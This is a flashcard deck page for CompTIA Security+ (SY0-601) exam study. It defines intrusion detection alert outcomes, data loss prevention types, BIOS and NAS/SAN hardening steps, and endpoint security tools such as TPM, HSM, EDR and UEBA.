CramX Logo
RegisterLog in
Back to AI Flashcard MakerInformation Technology /CompTIA Security+ (SY0-601): Security Applications & Devices

CompTIA Security+ (SY0-601): Security Applications & Devices

Information Technology11 CardsCreated 8 months ago

This section outlines methods for detecting and preventing unauthorized activity, including Intrusion Detection Systems (IDS) and Data Loss Prevention (DLP) solutions. It also covers best practices for securing BIOS configurations and protecting network and storage systems like NAS/SAN from unauthorized access and data breaches.

PrintEmbedImportReport

IDS & IDS Alerts

Intrusion Detection System:
Passively monitors network and alerts/identifies attacks
HIDS = Host-based | NIDS = Network-based
Signature, Policy, Anomaly-based

True Positive: Malicious activity is identified as an attack
False Positive: Legitimate activity is identified as an attack
True Negative: Legitimate activity is identified as legitimate traffic
False Negative: Malicious activity is identified as legitimate traffic

Rate to track your progress ✦

Tap or swipe ↕ to flip
Swipe ←→Navigate
1/11

Key Terms

Term
Definition

IDS & IDS Alerts

Intrusion Detection System:
Passively monitors network and alerts/identifies attacks
HIDS = Host-based | NIDS = Ne...

DLP & 3 Types of DLPs

Data Loss Prevention (Software or Hardware):
Monitors the data of a system while in use, in transit, or at rest to de...

Securing BIOS

  1. Flash the BIOS

  2. Use a BIOS password

  3. Securing NAS/SAN

    1. Use data encryption

    2. Use proper authentication

    3. SED

      Self-Encrypting Drive:

      Storage device that performs whole disk encryption by using embe...

    Disk Encryption Software

    Apple: FileVault
    Windows: BitLocker

    Related Flashcard Decks

    Information Technology

    Introduction to Information Systems

    This deck covers the fundamental concepts of information systems, including definitions, types, attributes, and the system development life cycle.

    30 cards
    View Deck
    Information Technology

    Elective ICT for West African Senior High Schools

    This deck covers key concepts from the Elective ICT syllabus for West African Senior High Schools, including information systems, digital technology, computer hardware, and more.

    10 cards
    View Deck
    Information Technology

    Computer System Buses and Components

    This flashcard deck covers key concepts related to computer system buses and their classifications, as well as the role of the CPU in a computer system.

    6 cards
    View Deck
    Information Technology

    Database Systems 621: Key Concepts

    This deck covers essential concepts from Chapter 1 of the Database Systems 621 module, including data vs. information, database architecture, user types, and data integrity.

    10 cards
    View Deck
    Information Technology

    Introduction to Programming and Software Development

    This deck covers the basics of programming languages, their generations, and the software development process, including the Program Development Cycle.

    5 cards
    View Deck
    Information Technology

    Introduction to Computers and Systems

    This deck covers the basics of computers, their evolution, components, and the role of software in computing. It also explores digital and analogue computers, data processing, problem-solving, and the importance of computers in modern society.

    20 cards
    View Deck
    Information Technology

    Funda Login and Support Guide

    This deck covers the login process for Funda using Microsoft 365 accounts, available language options, and where to find login assistance.

    10 cards
    View Deck
    Information Technology

    Funda Login and Support Guide

    This deck covers the login process for Funda, including available support options and language settings.

    10 cards
    View Deck
    Information Technology

    Introduction to ICT for Development

    This deck covers key concepts from the primer on ICT for Development, including the role of ICTs in socio-economic development, the digital divide, and global development goals.

    10 cards
    View Deck
    CompTIA Security+ (SY0-601): Security Applications & Devices
    TermDefinition

    IDS & IDS Alerts

    Intrusion Detection System:
    Passively monitors network and alerts/identifies attacks
    HIDS = Host-based | NIDS = Network-based
    Signature, Policy, Anomaly-based

    True Positive: Malicious activity is identified as an attack
    False Positive: Legitimate activity is identified as an attack
    True Negative: Legitimate activity is identified as legitimate traffic
    False Negative: Malicious activity is identified as legitimate traffic

    DLP & 3 Types of DLPs

    Data Loss Prevention (Software or Hardware):
    Monitors the data of a system while in use, in transit, or at rest to detect attempts to steal the data

    Also called Information Leak Protection (ILP) or Extrusion Prevention Systems (EPS)

    Network DLP System
    Software or hardware-based solution that is installed on the perimeter of the network to detect data in transit

    Storage DLP System
    Software installed on servers in the datacenter to inspect the data at rest

    Cloud DLP System
    Cloud software as a service that protects data being stored in cloud services

    Securing BIOS

    1. Flash the BIOS

    2. Use a BIOS password

    3. Configure the BIOS boot order

    4. Disable the external ports and devices

    5. Enable the secure boot option

    Securing NAS/SAN

    1. Use data encryption

    2. Use proper authentication

    3. Log NAS access

    SED

    Self-Encrypting Drive:

    Storage device that performs whole disk encryption by using embedded hardware

    Disk Encryption Software

    Apple: FileVault
    Windows: BitLocker

    TPM

    Trusted Platform Module:
    Chip residing on the motherboard that contains an encryption key

    If your motherboard doesn’t have TPM, you can use an external USB drive as a key

    HSM

    Hardware Security Module:

    Physical devices that act as a secure cryptoprocessor during the encryption process

    EPP

    Endpoint Protection Platform:
    A software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption

    EDR

    Endpoint Detection & Response:
    A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats

    Doesn’t use signature-based protection
    Behavioral analysis, ML, process monitoring
    Lightweight agent on the endpoint
    Root cause analysis

    UEBA

    User & Entity Behavior Analytics:
    A system that can provide automated identification of suspicious activity by user accounts and computer hosts

    UEBA solutions are heavily dependent on advanced computing techniques like artificial intelligence (AI) and machine learning

    Many companies are now marketing advanced threat protection (ATP), advanced endpoint protection (AEP), and NextGen AV (NGAV) which is a hybrid of EPP, EDR, and UEBA